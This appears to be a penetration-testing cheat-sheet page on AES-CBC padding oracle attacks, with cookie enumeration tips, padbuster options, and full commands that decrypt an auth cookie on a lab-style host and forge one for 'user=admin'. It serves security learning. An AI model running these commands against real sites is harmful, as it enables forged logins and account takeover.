AES-CBC Padding Oracle Attack

Enumeration

Cookies

Try appending characters to the cookie to see how padding errors change.
Check if the cookie length is a multiple of the block size (16 bytes for AES) to confirm block cipher usage.

Padbuster

Encoding

0 -> Base64
1 -> Lower Hex
2 -> Upper Hex
3 -> NET UrlToken
4 -> WebSafe Base64

Block-Size

8
16

Decrypt

padbuster http://10.10.10.18/index.php xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B 8 -cookies auth=xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B -encoding 0

Encrypting user=admin will produce a valid auth cookie:

padbuster http://10.10.10.18/index.php xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B 8 -cookies auth=xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B -encoding 0 -plaintext user=admin

The Padding Oracle Attack | Robert HeatonRobert Heaton

GitHub - glebarez/padre: Blazing fast, advanced Padding Oracle exploitGitHub

PreviousRSA Attacks NextUser Names

Last updated 9 days ago